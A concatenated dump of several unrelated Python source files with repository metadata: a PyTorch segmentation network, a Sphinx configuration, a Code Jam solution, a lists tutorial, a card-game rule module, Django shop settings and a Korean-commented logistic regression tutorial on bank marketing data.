self.conv6 = nn.Conv2d(in_channels=128,out_channels=128,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.down3 = nn.Conv2d(in_channels=128,out_channels=128,kernel_size=4,stride=2,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv3_bn = nn.BatchNorm2d(128)
self.lateral3 = nn.Conv2d(in_channels=128,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.lateral2 = nn.Conv2d(in_channels=64,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.lateral1 = nn.Conv2d(in_channels=32,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.upsample3 = nn.Upsample(scale_factor=2,mode='bilinear',align_corners=True)
self.upsample2 = nn.Upsample(scale_factor=2,mode='bilinear',align_corners=True)
self.conv7 = nn.Conv2d(in_channels=64,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv8 = nn.Conv2d(in_channels=64,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv9 = nn.Conv2d(in_channels=64,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.newft3_bn = nn.BatchNorm2d(64)
self.newft2_bn = nn.BatchNorm2d(64)
self.newft1_bn = nn.BatchNorm2d(64)
def forward(self,input):
ft1 = self.conv1_bn(F.leaky_relu(self.down1(F.leaky_relu(self.conv4(F.leaky_relu(self.conv1(input))))))) #1*32*160*160
ft2 = self.conv2_bn(F.leaky_relu(self.down2(F.leaky_relu(self.conv5(F.leaky_relu(self.conv2(ft1))))))) #1*64*80*80
ft3 = self.conv3_bn(F.leaky_relu(self.down3(F.leaky_relu(self.conv6(F.leaky_relu(self.conv3(ft2))))))) #1*128*40*40
new_ft3 = self.newft3_bn(F.leaky_relu(self.conv7(self.lateral3(ft3)))) #1*64*40*40 ; name as lateral3
new_ft2 = self.newft2_bn(F.leaky_relu(self.conv8(self.lateral2(ft2)+self.upsample3(new_ft3)))) #1*64*80*80
new_ft1 = self.newft1_bn(F.leaky_relu(self.conv9(self.lateral1(ft1)+self.upsample2(new_ft2)))) #1*64*160*160
return new_ft1,new_ft2,new_ft3
class SA(nn.Module):
def __init__(self):
super(SA, self).__init__()
self.downsample = nn.Conv2d(in_channels=192,out_channels=128,kernel_size=4,stride=2,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv1 = nn.Conv2d(in_channels=128,out_channels=128,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv2 = nn.Conv2d(in_channels=128,out_channels=128,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv3 = nn.Conv2d(in_channels=128,out_channels=128,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv4 = nn.Conv2d(in_channels=128,out_channels=128,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.upsample3 = nn.Upsample(scale_factor=4,mode='bilinear',align_corners=True)
self.upsample2 = nn.Upsample(scale_factor=2,mode='bilinear',align_corners=True)
self.downsample_bn = nn.BatchNorm2d(128)
self.bn_conv1 = nn.BatchNorm2d(128)
self.bn_conv2 = nn.BatchNorm2d(128)
self.bn_conv3 = nn.BatchNorm2d(128)
self.bn_conv4 = nn.BatchNorm2d(128)
def forward(self,new_ft1,new_ft2,new_ft3):
sa1 = new_ft1
sa2 = self.upsample2(new_ft2)
sa3 = self.upsample3(new_ft3)
		concat = torch.cat((sa1,sa2,sa3),dim=1) #1*192*160*160; torch.cat joins along an existing dim (unlike torch.stack, which adds a new one)
downsample = self.downsample_bn(F.leaky_relu(self.downsample(concat))) #1*128*80*80
conv = self.bn_conv1(F.leaky_relu(self.conv1(downsample))) #1*128*80*80
conv = self.bn_conv2(F.leaky_relu(self.conv2(conv))) #1*128*80*80
downsample = conv+downsample #residual connection; 1*128*80*80
conv = self.bn_conv3(F.leaky_relu(self.conv3(downsample))) #1*128*80*80
conv = self.bn_conv4(F.leaky_relu(self.conv4(conv))) #1*128*80*80
out = conv+downsample #residual connection; 1*128*80*80
return out
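
# Shape walk-through (a comment sketch assuming a 1x3x320x320 input, matching
# the per-layer shape comments above):
#   FPN outputs:  new_ft1 1x64x160x160, new_ft2 1x64x80x80, new_ft3 1x64x40x40
#   SA output:    1x128x80x80
#   full_model:   per-pixel log-probabilities of shape 1x7x320x320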
class full_model(nn.Module):
def __init__(self):
super(full_model,self).__init__()
self.fpn = FPN()
self.sa = SA()
self.final_conv = nn.Conv2d(in_channels=128,out_channels=7,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
		self.softmax = nn.LogSoftmax(dim=1)  # softmax over the 7 class channels
def forward(self, input, num_classes=7):
ft1,ft2,ft3 = self.fpn.forward(input)
sa_maps = self.sa.forward(ft1,ft2,ft3)
		out = F.interpolate(self.final_conv(sa_maps), input.size()[2:], mode='bilinear', align_corners=True)  # F.upsample is deprecated in favor of F.interpolate
return self.softmax(out) | [
"[email protected]"
] | |
37bdf2dde85f8ce44a0ed9c15e3028b0dce45219 | 221fa1f7a86c7b84941671e36993e1fee8be63a8 | /docs/source/conf.py | 726022cda46dc4d17624ecd88e848be02a343f3b | [
"MIT"
] | permissive | lkilcommons/geospacepy-lite | a2b8510f74f9c07d560fb98e955e1c69b07e7c8d | cbe2e23e5906aa922c661a81e75d26e4f7b29bd4 | refs/heads/master | 2022-05-16T09:51:59.044106 | 2022-03-29T16:53:52 | 2022-03-29T16:53:52 | 95,029,209 | 4 | 7 | MIT | 2022-03-29T16:53:54 | 2017-06-21T17:29:23 | Python | UTF-8 | Python | false | false | 5,142 | py | # -*- coding: utf-8 -*-
#
# geospacepy-lite documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 13 12:00:49 2019.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'geospacepy-lite'
copyright = u'2021, Liam Kilcommons'
author = u'Liam Kilcommons'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.2'
# The full version, including alpha/beta/rc tags.
release = u'0.2.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# html_theme = 'classic'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'geospacepy-litedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'geospacepy-lite.tex', u'geospacepy-lite Documentation',
u'Liam Kilcommons', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'geospacepy-lite', u'geospacepy-lite Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'geospacepy-lite', u'geospacepy-lite Documentation',
author, 'geospacepy-lite', 'One line description of project.',
'Miscellaneous'),
]
# Napoleon settings
napoleon_google_docstring = False
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = False
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
| [
"[email protected]"
] | |
6a3d2165725d9dbb9b0c88f30a3e8a0b10980d4f | 98e60f24bbd5613b01b2f6ab9d316111d525b5c2 | /Puzzles/CountingSheep/sleep.py | 9d65166133538de5025298f0521c6a4b85fe0833 | [] | no_license | tgomudur/CodingChallenges | eb49c9c25d16f4ebead4294fd88895c8c6f56feb | d5b7728de9066ab531295891b46c3983580b6b34 | refs/heads/master | 2020-12-24T20:51:42.040520 | 2016-05-23T23:47:31 | 2016-05-23T23:47:31 | 58,672,280 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | with open("A-large.in") as infile:
    lines = [int(item) for item in infile.readlines()]
    ntests = lines[0]
    numbers = lines[1:]
# ntests = input()
outfile = open("Output.txt", 'w')
for case in range(ntests):
    # n = input()
    n = numbers[case]
    seen = [0]*10   # which digits 0-9 have appeared so far
    seen_sum = 0
    i = 1
    if n == 0:
        outfile.write("Case #{}: INSOMNIA\n".format(case+1))
        continue
    else:
        num = n
    while seen_sum != 10:
        n = num*i
        original_num = n
        while n:
            digit = n % 10
            if seen[digit] == 0:
                seen[digit] = 1
                seen_sum += 1
                if seen_sum == 10:
                    outfile.write("Case #{}: {}\n".format(case + 1, original_num))
                    break
            n = n // 10  # integer division; n / 10 would make digit a float on Python 3
        i = i + 1
outfile.close()
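# Input format assumed by the reader above: the first line of A-large.in holds
# the number of test cases T, followed by T lines each holding one integer N.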
| [
"[email protected]"
] | |
da8ef3e826bf2022ad5601eb34a52dc472d1450a | 540f6a80b49f91c1d67d9c2eabedffc5b450c0d0 | /shifali/test45.py | 90f5bba80a4572097278994a996d394971f554ea | [] | no_license | shifalik/practice | 3a56c89bbf74c18d93eadbacae45e6c8d09795d5 | 3b2e862675f89a54a795be8058be3adc019ba24b | refs/heads/master | 2021-01-24T01:39:58.874359 | 2018-02-25T08:23:26 | 2018-02-25T08:31:34 | 122,817,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,481 | py | '''
Created on Feb 8, 2018
@author: shifa
'''
# Lists
# They are sequences
# NOTE: items in list don't have to be same data type
#--------------------------------------------------------
list1 = ['physics', 'chemistry', 1997, 2000]
list2 = [1, 2, 3, 4, 5]
list3 = ["a", "b", "c", "d"]
print("List1:", list1, "\nList2:", list2, "\nList3:", list3)
print()
#--------------------------------------------------------
print("Accessing values in list.")
print("list1[0]: ", list1[0])
print("list2[1:5]: ", list2[1:5])
print()
#--------------------------------------------------------
print("Updating Lists")
print("Value available at index 2: ", list1[2])
list1[2] = 2001
print("New value available at index 2: ", list1[2])
print()
#--------------------------------------------------------
print("Delete List Elements")
print(list1)
del list1[2]
print("After deleting value at index 2:\n", list1)
print()
#--------------------------------------------------------
print("Basic List Operations")
a = [1, 2, 3]
b = [4, 5, 6]
c = ['Hi!']
print("List a:", a, "\nList b:", b, "\nList c:", c)
print()
print("Length of a:", len(a))
print("Concatenation of a and b:", a + b)
print("Repetition of c:", c * 4)
print("Membership of 3 in a:", 3 in a)
# for loop to print all values of a
print("Printing values of a using for loop:")
for x in a:
print(x, end=' ')
# end=' ' gives it space while printing instead of
# printing on a new line
print()
print()
#--------------------------------------------------------
print("Indexing, Slicing, and Matrixes")
L = ['C++', 'Java', 'Python' , 'C#', 'Ruby']
print("List L:", L)
print()
print("Offsets start at 0:")
print("L[2]:", L[2])
print("Negative: count from the right:")
print("L[-2]:", L[-2])
#counts from backwards for L[-2]
print("Slicing fetches sections:")
print("L[1:]:", L[1:])
print()
#--------------------------------------------------------
print("BULIT IN FUNCTIONS AND METHODS")
#--------------------------------------------------------
print()
print("len(list)")
list1 = ['physics', 'chemistry', 'math']
print("list1: ", list1)
print("Length of list1: ", len(list1))
list2 = list(range(5)) # creates list of numbers between 0-4
print("list2: ", list2)
print("length of list2: ", len(list2))
print()
#--------------------------------------------------------
print("max(list)")
# max valued element is to be returned
list1, list2 = ['C++', 'Java', 'Za', 'Zb' ,'Python', 'Alphabetical'], [456, 700, 200]
#max prints higher valued letter in beginning
print("list1:", list1, "\nlist2", list2)
print("Max value element from list1:", max(list1))
print("Max value element from list2:", max(list2))
#--------------------------------------------------------
print("min(list)")
# using above lists
print("Min value element from list1:", min(list1))
print("Min value element from list2:", min(list2))
print()
#--------------------------------------------------------
print("list(seq)")
# takes sequence types and converts them to lists
# used to convert tuple or string into list
# tuple uses (), lists use []
aTuple = (123, 'C++', 'Java', 'Python')
list1 = list(aTuple)
print("List elements from tuple:", list1)
str1 = "Hello World"
list2 = list(str1)
print("list elements from string:", list2)
print()
#--------------------------------------------------------
print("METHODS")
#--------------------------------------------------------
print()
print("list.append(obj)")
# does not return value but updates list
list1 = ['C++', 'Java', 'Python']
print("list1:", list1)
list1.append('C#')
print("updated list:", list1)
print()
#--------------------------------------------------------
print("list.count(obj)")
# returns count of how many times obj occurs in list
aList = [123, 'xyz', 'zara', 'abc', 123]
print("aList:", aList)
print("Count for 123:", aList.count(123))
print("Count for zara:", aList.count('zara'))
# tested: if there are no values then it will return 0
print()
#--------------------------------------------------------
print("list.extend(seq)")
# appends the contents of seq to list
# does not return any value but adds the content
# to existing list
list1 = ['physics', 'chemistry', 'math']
list2 = list(range(5))
print("list1:", list1)
print("list2:", list2)
list1.extend(list2)
print("Extended List:", list1)
#different from concatenation because in concatenation you
#need to store a + b into c
#here we don't need to because list1 is extended
print()
#--------------------------------------------------------
print("list.index(obj)")
# returns lowest index in list that obj appears
# raises exception if object not found
list1 = ['physics', 'chemistry', 'math']
print("list1:", list1)
print("Index of chemistry:", list1.index("chemistry"))
# print("Index of C#", list1.index("C#"))
# throws exception like it should
print()
#--------------------------------------------------------
print("list.insert(index, obj)")
# inserts object into list at offset index
# index is where object obj is needed to be inserted
# obj is what is going in the list
list1 = ['physics', 'chemistry', 'math']
print("list1:", list1)
list1.insert(1, 'biology')
print("Final List: ", list1)
# all else gets pushed down the list
print()
#--------------------------------------------------------
print('list.pop(obj=list[-1])')
# removes and returns last object from the list
# obj is optional parameter, can give index of object
list1 = ['physics', 'biology', 'chemistry', 'math']
print("list1:", list1)
list1.pop() # takes off last element
print("list1 now:", list1)
list1.pop(1) # takes off list1[1] element
print("list1 now:", list1)
print()
#--------------------------------------------------------
print('list.remove(obj)')
list1 = ['physics', 'biology', 'chemistry', 'math']
print("list1:", list1)
list1.remove('biology')
print("list1 now:", list1)
list1.remove("math")
print("list1 now:", list1)
print()
#--------------------------------------------------------
print("list.reverse()")
# reverses objects of list in place
list1 = ['physics', 'biology', 'chemistry', 'math']
print("list1:", list1)
list1.reverse()
print("reversed list1:", list1)
print()
#--------------------------------------------------------
print("list.sort([func])")
# sorts objects of list
list1 = ['physics', 'biology', 'chemistry', 'math']
print("list1:", list1)
list1.sort()
print("sorted list1:", list1)
print()
#--------------------------------------------------------
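print("sorted(list) vs list.sort()")
# A short aside (an addition to these notes): sorted() returns a new sorted
# list and leaves the original unchanged, while list.sort() sorts in place.
list1 = ['physics', 'biology', 'chemistry', 'math']
print("sorted copy:", sorted(list1))
print("original unchanged:", list1)
print()
#--------------------------------------------------------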
| [
"[email protected]"
] | |
4cb3132b3aba020e6a7b65472a7ad7b7c5d907e7 | 670881ff3ef0bf07e3e4d93e8da5917ace9238e8 | /src/core/rule.py | 47497f7aa1ad3fb62f87a123cf83f910af37cec1 | [] | no_license | anninz/xiyouji | 74e6777af27f86d0d1dd688702785348ba2efc24 | 6f2f3436803ffb0a13b95b1f27ff593567be9341 | refs/heads/master | 2020-03-17T03:00:44.602635 | 2018-05-19T10:13:08 | 2018-05-19T10:13:08 | 133,215,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,144 | py | from collections import Counter
import logging
import json
logger = logging.getLogger('ddz')
'''
# A 2 3 4 5 6 7 8 9 0 J Q K W w
# Scoring
# If the landlord plays out all of his cards first, he wins; if no bomb or
# rocket was played, each peasant pays the landlord the bid (1, 2 or 3 points).
# If either peasant finishes first, the landlord loses and pays the bid to each peasant.
# Every time any player plays a bomb or a rocket, the score doubles.
# For example, if a hand sees 2 bombs and 1 rocket, a landlord who bid 3 and finishes first wins 24 points from each peasant [48 points in total];
# if a peasant finishes first, the landlord loses 24 points to each peasant [48 points in total].
'''
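# Poker id encoding assumed throughout this module: ids 0-51 cover the four
# suits of A,2,...,K (id % 13 indexes 'A234567890JQK'), 52 is the small joker
# 'w' and 53 is the big joker 'W'; for example _to_cards([0, 13, 52]) gives
# ['A', 'A', 'w'].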
CARD_TYPES = [
'single', 'pair', 'trio', 'four', 'five',
'six', 'seven', 'eight'
]
with open('static/rule.json', 'r') as f:
rules = json.load(f)
def get_poker_attr(value):
type = 0
if value == 10:
type = 6
if value == 9:
type = 5
if value == 8:
type = 4
if value == 7:
type = 3
if value == 4 or value == 5 or value == 6:
type = 2
if value == 0 or value == 1 or value == 2 or value == 3:
type = 1
return type
def compare_poker_1(cardA, cardB):
typeA = get_poker_attr(cardA)
typeB = get_poker_attr(cardB)
if typeA == typeB:
return (cardA - cardB) > 0
elif typeB == 3 and typeA != 2:
return 1
elif typeB == 1:
if typeA != 3 and typeA != 1:
return 1
elif typeA > typeB:
return 1
return 0
def is_contains(parent, child):
parent, child = Counter(parent), Counter(child)
for k, n in child.items():
if k not in parent or n > parent[k]:
return False
return True
def cards_above(hand_pokers, turn_pokers):
hand_cards = _to_cards(hand_pokers)
turn_cards = _to_cards(turn_pokers)
card_type, card_value, card_type1 = _cards_value(turn_cards)
if not card_type:
return []
one_rule = rules[card_type]
for i, t in enumerate(one_rule):
if compare_poker_1(i, card_value) and is_contains(hand_cards, t):
return _to_pokers(hand_pokers, t)
return []
def _to_cards(pokers):
cards = []
for p in pokers:
if p == 53:
cards.append('W')
elif p == 52:
cards.append('w')
else:
cards.append('A234567890JQK'[p % 13])
return _sort_card(cards)
def _to_poker(card):
if card == 'W':
return [53]
if card == 'w':
return [52]
cards = 'A234567890JQK'
for i, c in enumerate(cards):
if c == card:
return [i, i + 13, i + 13*2, i + 13*3]
return [54]
def _to_pokers(hand_pokers, cards):
pokers = []
for card in cards:
candidates = _to_poker(card)
for cd in candidates:
if cd in hand_pokers and cd not in pokers:
pokers.append(cd)
break
return pokers
def _cards_value(cards):
cards = ''.join(cards)
return _card_type(cards)
def compare_poker(a_pokers, b_pokers):
if not a_pokers or not b_pokers:
if a_pokers == b_pokers:
return 0
if a_pokers:
return 1
if b_pokers:
return 1
a_card_type, a_card_value, a_card_type1 = _cards_value(_to_cards(a_pokers))
b_card_type, b_card_value, b_card_type1 = _cards_value(_to_cards(b_pokers))
if a_card_type == b_card_type:
return compare_poker_1(a_card_value, b_card_value)
return 0
def _sort_card(cards):
cards.sort(key=lambda ch: '34567890JQKA2wW'.index(ch))
return cards
def _index_of(array, ele):
if len(array[0]) != len(ele):
return -1
for i, e in enumerate(array):
if e == ele:
return i
return -1
def _card_type(cards):
for t in CARD_TYPES:
value = _index_of(rules[t], cards)
if value >= 0:
return t, value, get_poker_attr(value)
logger.info('Unknown Card Type: %s', cards)
# raise Exception('Unknown Card Type: %s' % cards)
return '', 0, -1
| [
"[email protected]"
] | |
09776316fb421e0bbceaef668d1fa5dd48acefec | e094acbfb223a19521a742befc5b7d45987749ff | /myshop/settings.py | 384f29086ed62c1f039fd3ad462f80db15e5ee88 | [] | no_license | bolajixi/django-commerce-shop | 41f8e75e8e33132c59c2e3a5e6e08f74217c1f65 | 86a3d4e988135d9982b352134d29904adc643d9d | refs/heads/main | 2023-07-23T03:11:18.039631 | 2021-08-23T06:55:12 | 2021-08-23T06:55:12 | 395,966,639 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,622 | py | """
Django settings for myshop project.
Generated by 'django-admin startproject' using Django 3.1.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
from dotenv import load_dotenv
load_dotenv()
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.getenv("PROJECT_SECRET_KEY")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'shop.apps.ShopConfig',
'cart.apps.CartConfig',
'orders.apps.OrdersConfig',
'payment.apps.PaymentConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'myshop.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'cart.context_processors.cart',
],
},
},
]
WSGI_APPLICATION = 'myshop.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
    # Joining a path that starts with '/' would discard BASE_DIR entirely,
    # so use a relative folder name here rather than STATIC_URL.
    BASE_DIR / 'static',
]
MEDIA_URL = '/media/'
MEDIA_ROOT = BASE_DIR / 'media/'
CART_SESSION_ID = 'cart'
# Configure email to send to console
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
PAYSTACK_SECRET_KEY = os.getenv("PAYSTACK_AUTHORIZATION_KEY")
PAYSTACK_TEST_PUB_KEY = os.getenv("PAYSTACK_TEST_PUB_KEY")
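
# Example .env consumed by load_dotenv() above (illustrative values only):
# PROJECT_SECRET_KEY=django-insecure-change-me
# PAYSTACK_AUTHORIZATION_KEY=sk_test_xxxx
# PAYSTACK_TEST_PUB_KEY=pk_test_xxxx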
| [
"[email protected]"
] | |
177bb4da1f8539439aa74c5b45afc7144f03ae11 | 167fdbfb5a68d49eb6de65200563b8db03d956b2 | /reference/understanding-ml-code/ch13-분류 문제와 로지스틱 회귀 분석/logistic_intro.py | 350bde497a83f448462caa1fcfc9448fd7a92379 | [] | no_license | Naamu/ml-learning | 11ad20f2e1f06701e362e2c6ca86d8070163a95f | 5276026f01c31708d494d7c4d8b1cdc3cc66f57d | refs/heads/master | 2022-09-04T17:32:29.540737 | 2022-07-20T00:28:48 | 2022-07-20T00:28:48 | 187,772,008 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,477 | py | #
# Program name: logistic_intro.py
# Author: Bong Ju Kang
# Description: understanding classification problems via logistic regression
#
# required packages
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import requests, zipfile, io
from sklearn.linear_model import LinearRegression, LogisticRegressionCV
from sklearn.linear_model import LogisticRegression
from sklearn import metrics
from sklearn.model_selection import train_test_split
# initial settings
png_path = "./data/png"
os.makedirs(png_path, exist_ok=True)
# enable Korean text in the plots
plt.rcParams['font.family'] = 'Malgun Gothic'
plt.rcParams['axes.unicode_minus'] = False
# fetch the data
path = 'https://archive.ics.uci.edu/ml/machine-learning-databases/00222/'
zip_url = path + 'bank.zip'
z = zipfile.ZipFile(io.BytesIO(requests.get(zip_url).content)) # 짚 파일 풀기
z.infolist() # 짚 파일 내의 구성 요소 보기
df = pd.read_csv(z.open('bank.csv'),sep=';') # 특정 요소 가져오기
df.columns
# 데이터 속성
# Input variables:
# # bank client data:
# 1 - age (numeric)
# 2 - job : type of job (categorical: "admin.","unknown","unemployed","management","housemaid","entrepreneur","student",
# "blue-collar","self-employed","retired","technician","services")
# 3 - marital : marital status (categorical: "married","divorced","single"; note: "divorced" means divorced or widowed)
# 4 - education (categorical: "unknown","secondary","primary","tertiary")
# 5 - default: has credit in default? (binary: "yes","no")
# 6 - balance: average yearly balance, in euros (numeric)
# 7 - housing: has housing loan? (binary: "yes","no")
# 8 - loan: has personal loan? (binary: "yes","no")
# # related with the last contact of the current campaign:
# 9 - contact: contact communication type (categorical: "unknown","telephone","cellular")
# 10 - day: last contact day of the month (numeric)
# 11 - month: last contact month of year (categorical: "jan", "feb", "mar", ..., "nov", "dec")
# 12 - duration: last contact duration, in seconds (numeric)
# # other attributes:
# 13 - campaign: number of contacts performed during this campaign and for this client (numeric, includes last contact)
# 14 - pdays: number of days that passed by after the client was last contacted from a previous campaign (numeric, -1 means client was not previously contacted)
# 15 - previous: number of contacts performed before this campaign and for this client (numeric)
# 16 - poutcome: outcome of the previous marketing campaign (categorical: "unknown","other","failure","success")
#
# Output variable (desired target):
# 17 - y - has the client subscribed a term deposit? (binary: "yes","no")
df.info()
df.y.value_counts() # check the target variable distribution
# no 4000
# yes 521
# Name: y, dtype: int64
# Replace the string target with a numeric variable
df['num_y'] = pd.get_dummies(df['y'], drop_first=True)
# Define variables
x = df['duration']
y = df['num_y']
#
# Fit a linear regression model
#
# Scatter plot: contact duration vs term-deposit subscription (num_y)
plt.figure(figsize=(6,4))
plt.scatter(x,y, s=1, label="산점도")
plt.xlabel("접촉시간")
plt.ylabel('정기예금가입여부')
plt.title('접촉시간 vs. 정기예금가입여부 산점도 및 선형회귀 직선')
# Linear regression model
regmodel = LinearRegression(fit_intercept=True)
regmodel.fit(x.values.reshape((-1,1)), y.values.reshape((-1,1)))
h = regmodel.predict(x.values.reshape((-1,1)))
plt.plot(x,h, color='orange', label="선형회귀")
plt.ylim((-0.1,1.1))
plt.legend()
plt.savefig(png_path + '/logistic_linearfit.png')
plt.show()
#
# Fitting the logistic function
#
# Examine the shape of the logistic function
z = np.linspace(-5,5,100)
p_z = 1/(1+np.exp(-z))
plt.figure(figsize=(6,4))
plt.plot(z,p_z, color='black', label='logistic function')
plt.xlabel('z')
plt.ylabel('p(z)')
plt.legend()
plt.savefig(png_path + '/logistic_logisticCurve.png')
plt.show()
# Fit the logistic regression model (scikit-learn expects a 2-D feature array)
logisticModel = LogisticRegression(random_state=123)
logisticModel.fit(x.values.reshape(-1, 1), y)
# Fitted results
logisticModel.coef_
logisticModel.intercept_
# Prediction
logisticModel.predict_proba(x.values.reshape(-1, 1)).shape
df['num_y'].value_counts()
predicted = logisticModel.predict(x.values.reshape(-1, 1))
prob = logisticModel.predict_proba(x.values.reshape(-1, 1))[:,1] # probability of class 'yes'
np.unique(predicted, return_counts=True)
score = logisticModel.score(x.values.reshape(-1, 1), y) # correct-classification rate (accuracy)
# 0.8882990488829905
# confusion matrix
metrics.confusion_matrix(y, predicted)
# array([[3913, 87],
# [ 350, 171]], dtype=int64)
# Plot the fitted results
plt.figure(figsize=(6,4))
plt.scatter(x,y, s=1)
plt.xlabel("접촉시간")
plt.ylabel('정기예금가입여부')
plt.title('접촉시간 vs. 정기예금가입여부 산점도 및 로지스틱회귀 곡선')
